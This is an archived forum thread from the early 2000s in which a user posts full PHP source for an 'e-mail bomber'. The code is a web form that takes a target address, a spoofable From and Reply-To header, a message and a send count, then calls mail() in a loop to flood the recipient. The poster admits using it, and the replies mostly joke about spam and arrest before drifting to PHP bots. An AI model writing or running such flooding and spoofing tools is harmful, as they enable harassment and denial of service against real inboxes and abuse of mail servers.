Valhalla Legends Forums Archive | Web Development | PHP E-Mail Bomber Huh.

AuthorMessageTime
ProjecT
Huh, Php e-Mail Bomber:
<?php
if ($submit == "go!"){
$extra = "From: $from\r\nReply-To: $replyto\r\n";
echo "
<table>
<tr>
<td>To:</td>
<td>$recipient</td>
</tr>
<tr>
<td>From:</td>
<td>$from</td>
</tr>
<tr>
<td>Reply-to:</td>
<td>$replyto</td>
</tr>
<tr>
<td>Subject:</td>
<td>$subject</td>
</tr>
<tr>
<td>Message:</td>
<td>$message</td>
</tr>
<tr>
<td>Number to send:</td>
<td>$number</td>
</tr>
</table>
<br>Sending... ";
for ($i = 0; $i < $number; $i++){
mail ($recipient, $subject, $message, $extra);
}
echo "done</body></html>";
}
else{
echo "
<form method='post' action='emailbomber.php'>
<table>
<tr>
<td>To:</td>
<td><input type='text' name='recipient'></input></td>
</tr>
<tr>
<td>From:</td>
<td><input type='text' name='from'></input></td>
</tr>
<tr>
<td>Reply-to:</td>
<td><input type='text' name='replyto'></input></td>
</tr>
<tr>
<td>Subject:</td>
<td><input type='text' name='subject'></input></td>
</tr>
<tr>
<td>Message:</td>
<td><input type='text' name='message'></input></td>
</tr>
<tr>
<td>Number to send:</td>
<td><input type='text' name='number'></input></td>
</tr>
</table>
<input type='submit' name='submit' value='go!'></input>
</form> ";
}
?>
December 25, 2003, 6:08 PM
peofeoknight
Would you be running your own smtp? Most hosts would get pissed by flooding their smtp with spam :P
December 25, 2003, 8:07 PM
ProjecT
Well, not really lol.. I just use it on special times lol..
December 27, 2003, 12:52 AM
St0rm.iD
Wow, someone thinks they're too cool for school.
December 27, 2003, 2:29 AM
ProjecT
Im soooo bored..,
Hmm it isnt possible to make a php bot? right?
December 27, 2003, 3:29 AM
St0rm.iD
It's possible, but probably not the ideal language to write one in.
December 27, 2003, 5:15 AM
peofeoknight
How would you do that, would you use ssl with php?
December 27, 2003, 8:34 PM
St0rm.iD
You'd use the sockets api.
December 27, 2003, 9:59 PM
ProjecT
Allot of people have told me u cant like shadowed, and he is really good at this, i told him about the sockets long time ago and he told me dont even try to :o.
December 29, 2003, 4:17 AM
CrAzY
Would you really want to post a bomber on a website... Might be arrested :)
January 14, 2004, 1:38 PM
SNiFFeR
I doubt you can get arrested for showing someone how something is done.
January 14, 2004, 6:11 PM
peofeoknight
its a simple feedback form, its only harmful when you put it in a loop :P
January 14, 2004, 10:04 PM

Search